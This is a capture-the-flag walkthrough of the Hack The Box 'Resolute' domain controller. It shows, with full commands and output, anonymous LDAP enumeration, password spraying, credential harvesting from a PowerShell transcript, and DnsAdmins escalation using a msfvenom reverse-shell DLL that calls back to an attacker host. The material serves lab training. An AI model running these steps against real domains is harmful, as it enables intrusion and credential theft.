> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-resolute.md).

# HTB - Resolute

## Enumeration and Foothold

```bash
PORT      STATE SERVICE      VERSION                      
53/tcp    open  domain       Simple DNS Plus              
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2026-06-17 21:44:41Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49686/tcp open  msrpc        Microsoft Windows RPC
49710/tcp open  msrpc        Microsoft Windows RPC
49735/tcp open  msrpc        Microsoft Windows RPC

```

### SMB

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.96.155 -u '' -p ''                 
SMB         10.129.96.155   445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.96.155   445    RESOLUTE         [+] megabank.local\: 
                                                                            
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.96.155 -u '' -p '' --shares
SMB         10.129.96.155   445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.96.155   445    RESOLUTE         [+] megabank.local\: 
SMB         10.129.96.155   445    RESOLUTE         [-] Error enumerating shares: STATUS_ACCESS_DENIED
                                                                            
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.96.155 -u 'guest' -p '' --shares
SMB         10.129.96.155   445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\guest: STATUS_ACCOUNT_DISABLED
```

anonymous access but cant list shares.

Domain : `megabank.local`

No dns zone transfer.

machine is a `Microsoft Windows Server 2008 R2 - 2012.`

### LDAP

```bash
──(ajay㉿kali)-[~]
└─$ ldapsearch -H ldap://10.129.96.155  -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=megabank,DC=local
namingContexts: CN=Configuration,DC=megabank,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
namingContexts: DC=ForestDnsZones,DC=megabank,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
```

Successful anonymous bind.

That said i can enumerate the users from the domain.

```bash
──(ajay㉿kali)-[~]
└─$ ldapsearch -H ldap://10.129.96.155 -x -b "DC=megabank,DC=local" "(&(objectClass=user)(objectCategory=person))" sAMAccountName displayName description mail
# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (&(objectClass=user)(objectCategory=person))
# requesting: sAMAccountName displayName description mail 
#

# Guest, Users, megabank.local
dn: CN=Guest,CN=Users,DC=megabank,DC=local
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest

# DefaultAccount, Users, megabank.local
dn: CN=DefaultAccount,CN=Users,DC=megabank,DC=local
description: A user account managed by the system.
sAMAccountName: DefaultAccount

# Ryan Bertrand, Contractors, MegaBank Users, megabank.local
dn: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
displayName: Ryan Bertrand
sAMAccountName: ryan

# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to Welcome123!
displayName: Marko Novak
sAMAccountName: marko

# Sunita Rahman, Users, megabank.local
dn: CN=Sunita Rahman,CN=Users,DC=megabank,DC=local
sAMAccountName: sunita

# Abigail Jeffers, Users, megabank.local
dn: CN=Abigail Jeffers,CN=Users,DC=megabank,DC=local
sAMAccountName: abigail

# Marcus Strong, Users, megabank.local
dn: CN=Marcus Strong,CN=Users,DC=megabank,DC=local
sAMAccountName: marcus

# Sally May, Users, megabank.local
dn: CN=Sally May,CN=Users,DC=megabank,DC=local
sAMAccountName: sally

# Fred Carr, Users, megabank.local
dn: CN=Fred Carr,CN=Users,DC=megabank,DC=local
sAMAccountName: fred

# Angela Perkins, Users, megabank.local
dn: CN=Angela Perkins,CN=Users,DC=megabank,DC=local
sAMAccountName: angela

# Felicia Carter, Users, megabank.local
dn: CN=Felicia Carter,CN=Users,DC=megabank,DC=local
sAMAccountName: felicia

# Gustavo Pallieros, Users, megabank.local
dn: CN=Gustavo Pallieros,CN=Users,DC=megabank,DC=local
sAMAccountName: gustavo

# Ulf Berg, Users, megabank.local
dn: CN=Ulf Berg,CN=Users,DC=megabank,DC=local
sAMAccountName: ulf

# Stevie Gerrard, Users, megabank.local
dn: CN=Stevie Gerrard,CN=Users,DC=megabank,DC=local
sAMAccountName: stevie

# Claire Norman, Users, megabank.local
dn: CN=Claire Norman,CN=Users,DC=megabank,DC=local
sAMAccountName: claire

# Paulo Alcobia, Users, megabank.local
dn: CN=Paulo Alcobia,CN=Users,DC=megabank,DC=local
sAMAccountName: paulo

# Steve Rider, Users, megabank.local
dn: CN=Steve Rider,CN=Users,DC=megabank,DC=local
sAMAccountName: steve

# Annette Nilsson, Users, megabank.local
dn: CN=Annette Nilsson,CN=Users,DC=megabank,DC=local
sAMAccountName: annette

# Annika Larson, Users, megabank.local
dn: CN=Annika Larson,CN=Users,DC=megabank,DC=local
sAMAccountName: annika

# Per Olsson, Users, megabank.local
dn: CN=Per Olsson,CN=Users,DC=megabank,DC=local
sAMAccountName: per

# Claude Segal, Users, megabank.local
dn: CN=Claude Segal,CN=Users,DC=megabank,DC=local
sAMAccountName: claude

# Melanie Purkis, Users, megabank.local
dn: CN=Melanie Purkis,CN=Users,DC=megabank,DC=local
sAMAccountName: melanie

# Zach Armstrong, Users, megabank.local
dn: CN=Zach Armstrong,CN=Users,DC=megabank,DC=local
sAMAccountName: zach

# Simon Faraday, Users, megabank.local
dn: CN=Simon Faraday,CN=Users,DC=megabank,DC=local
sAMAccountName: simon

# Naoki Yamamoto, Users, megabank.local
dn: CN=Naoki Yamamoto,CN=Users,DC=megabank,DC=local
sAMAccountName: naoki

# search reference
ref: ldap://ForestDnsZones.megabank.local/DC=ForestDnsZones,DC=megabank,DC=loc
 al

# search reference
ref: ldap://DomainDnsZones.megabank.local/DC=DomainDnsZones,DC=megabank,DC=loc
 al

# search reference
ref: ldap://megabank.local/CN=Configuration,DC=megabank,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 29
# numEntries: 25
# numReferences: 3
```

There is a password for user Marko Novak in the description field.

```bash
# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to Welcome123!
displayName: Marko Novak
sAMAccountName: marko
```

Also i have extracted the users to a file to check for kerberoast or asreprast users.

```bash
┌──(ajay㉿kali)-[~/Tools/windapsearch]
└─$ python3 windapsearch.py --dc-ip 10.129.96.155 -u "" -p "" -U | grep "userPrincipalName:" | cut -d: -f2 | sed 's/ @megabank.local//' | tr -d ' '
ryan@megabank.local
marko@megabank.local
sunita@megabank.local
abigail@megabank.local
marcus@megabank.local
sally@megabank.local
fred@megabank.local
angela@megabank.local
felicia@megabank.local
gustavo@megabank.local
ulf@megabank.local
stevie@megabank.local
claire@megabank.local
paulo@megabank.local
steve@megabank.local
annette@megabank.local
annika@megabank.local
per@megabank.local
claude@megabank.local
melanie@megabank.local
zach@megabank.local
simon@megabank.local
naoki@megabank.local           
```

```bash
┌──(ajay㉿kali)-[~]
└─$ sed 's/@megabank\.local//' users.txt    
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki 
```

```bash
──(ajay㉿kali)-[~/Tools/windapsearch]
└─$ nxc smb 10.129.96.155 -u 'marko' -p 'Welcome123!'
SMB         10.129.96.155   445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
```

Login failed for the user, with that said i will the use password to spray aganist the extracted  users list.

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.96.155 -u ~/users.txt -p 'Welcome123!'  
SMB         10.129.96.155   445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 

```

`+] megabank.local\melanie:Welcome123!`

Got successful creds.

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc winrm 10.129.96.155 -u melanie -p 'Welcome123!'
WINRM       10.129.96.155   5985   RESOLUTE         [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.155   5985   RESOLUTE         [+] megabank.local\melanie:Welcome123! (Pwn3d!)
                                                                                                    
```

Winrm access confirmed by nxc.

## Shell as melanie

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8DOKpgpA3wSsG4bqwWMt%2Fimage.png?alt=media&amp;token=a413ad9e-d3cf-41bc-8dd8-77d6b5f0d40f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fy7lOwkzCPEpXdnDksDCk%2Fimage.png?alt=media&amp;token=91ec3df5-50d8-40e5-a80b-b6ee2f01892e" alt=""><figcaption></figcaption></figure>

There is another user ryan in the users directory and also Adminsitrator user.

With this data i have collected the bloodhound data to see if melanie have any object outbound control privileges.

### Bloodhound

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmTtx6a0fn9IVCFTg8naZ%2Fimage.png?alt=media&amp;token=34b99d13-9771-4179-a945-e9e1eb7ea39b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FghBUJjPwCdiwbTmV271m%2Fimage.png?alt=media&amp;token=c2648646-aeb4-4842-b2f7-2f6e3343d9a6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FeR8086jMRi697GBvS3W2%2Fimage.png?alt=media&amp;token=e55d4d15-4dc5-4386-b80d-12ce5cea9dbc" alt=""><figcaption></figcaption></figure>

Melanie dont have any specific privileges that we can abuse.

With that said i have uploaded winpeas to the target to enumerate any specific loopholes that can allow me to get to Adminsitrator.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBhGa6YYOZi1oCZiwzYLn%2Fimage.png?alt=media&amp;token=beabe26e-b895-49d6-b4db-3ce3f41f5962" alt=""><figcaption></figcaption></figure>

Winpeas found nothing, But viewing the hidden files in the c:/ there is a directory called PSTranscripts.

```bash
*Evil-WinRM* PS C:\> ls -Force

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        6/17/2026   3:22 PM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        6/17/2026   2:41 PM      402653184 pagefile.sys

```

```bash
*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> ls
*Evil-WinRM* PS C:\PSTranscripts> ls -Force

    Directory: C:\PSTranscripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203

*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> ls
*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -force

    Directory: C:\PSTranscripts\20191203

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

*Evil-WinRM* PS C:\PSTranscripts\20191203> 

```

Reading the transcript file revealed the clear text password for ryan user.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPqnAigRuuW96uGjZxeda%2Fimage.png?alt=media&amp;token=08b552e3-6fda-4713-a789-943d41c747ab" alt=""><figcaption></figcaption></figure>

`ryan :Serv3r4Admin4cc123!`

Ryan is part of Remote management group. sow e can login through winrm and get shell access.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLVeSwdzFh5c1px5A14Gm%2Fimage.png?alt=media&amp;token=1adb6bd6-6a48-4f35-8078-1ad68b3c125d" alt=""><figcaption></figcaption></figure>

## Shell as ryan

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8ZL0Wk5IMbKIattYZ0Xx%2Fimage.png?alt=media&amp;token=042a8650-e027-4c35-8245-9500ce78f7ae" alt=""><figcaption></figcaption></figure>

There is a note file in the desktop of ryan.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJ8yFl86RxPoPnwNS96NC%2Fimage.png?alt=media&amp;token=ff0c05aa-b7df-4b72-b817-d2813cb6290b" alt=""><figcaption></figcaption></figure>

Any changes made to administrator user will not be reverted back in a minute.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FttRCCkLT90J4upXRENON%2Fimage.png?alt=media&amp;token=04f1fd33-1a50-4713-af84-e1fc6a0cb04b" alt=""><figcaption></figcaption></figure>

Ryan is part of DNS admins group which we can utilize this to get to the Administrator.

### Abusing DNSAdmins Group Privilege

**`courtesy : Hack The Box CPTS course`**

Members of the [DnsAdmins](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#dnsadmins) group have access to DNS information on the network. The DNS service runs as NT AUTHORITY\SYSTEM, so membership in this group could potentially be leveraged to escalate privileges on a Domain Controller or in a situation where a separate server is acting as the DNS server for the domain. It is possible to use the built-in [dnscmd](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd) utility to specify the path of the plugin DLL. As detailed in this excellent [post](https://adsecurity.org/?p=4064), the following attack can be performed when DNS is run on a Domain Controller (which is very common):

* DNS management is performed over RPC
* [ServerLevelPluginDll](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dnsp/c9d38538-8827-44e6-aa5e-022a016ed723) allows us to load a custom DLL with zero verification of the DLL's path. This can be done with the dnscmd tool from the command line
* When a member of the DnsAdmins group runs the dnscmd command below, the `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll` registry key is populated
* When the DNS service is restarted, the DLL in this path will be loaded (i.e., a network share that the Domain Controller's machine account can access)
* An attacker can load a custom DLL to obtain a reverse shell or even load a tool such as Mimikatz as a DLL to dump credentials.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9JOb89vBNP0gBHUbr6a3%2Fimage.png?alt=media&amp;token=a647fabd-6604-42b1-9da0-7a3d8c9c0bb4" alt=""><figcaption></figcaption></figure>

Confirmation that ryan is part of dnsadmins as he is part contractors group he inherits the permissions.

i can use the msfvenom to generate a payload here.

```bash
┌──(ajay㉿kali)-[~]
└─$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.240 LPORT=4444 -f dll -o admin.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: admin.dll
```

```bash
*Evil-WinRM* PS C:\Users\ryan\Documents> Invoke-WebRequest -Uri "<http://10.10.14.240/admin.dll>" -OutFile "C:\Users\ryan\Documents\admin.dll"
*Evil-WinRM* PS C:\Users\ryan\Documents> dir

    Directory: C:\Users\ryan\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/17/2026   4:24 PM           9216 admin.dll
-a----        6/17/2026   4:16 PM              5 query

*Evil-WinRM* PS C:\Users\ryan\Documents> 
*Evil-WinRM* PS C:\Users\ryan\Documents> dir

    Directory: C:\Users\ryan\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/17/2026   4:16 PM              5 query

```

running it again the exploit gets deleted according to the note.txt, so i will setup a smb share and host the file there and run the command to pull the file from the smb server directly.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fgud3Ees9STZU7f7IH5Pw%2Fimage.png?alt=media&amp;token=25c13e74-5a58-460a-ad73-1aa3aa8d5bd7" alt=""><figcaption></figcaption></figure>

```bash
*Evil-WinRM* PS C:\Users\ryan\Desktop> dnscmd.exe /config /serverlevelplugindll \\10.10.14.240\share\admin.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Desktop> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Desktop> sc.exe query dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Desktop> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 4348
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Desktop> 
```

## Shell as nt authority\system

```bash
──(ajay㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.240] from (UNKNOWN) [10.129.96.155] 52749
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D1AC-5AF6

 Directory of C:\Users\Administrator\Desktop

12/04/2019  06:18 AM    <DIR>          .
12/04/2019  06:18 AM    <DIR>          ..
06/17/2026  02:42 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,471,276,544 bytes free

C:\Users\Administrator\Desktop>

```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-resolute.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
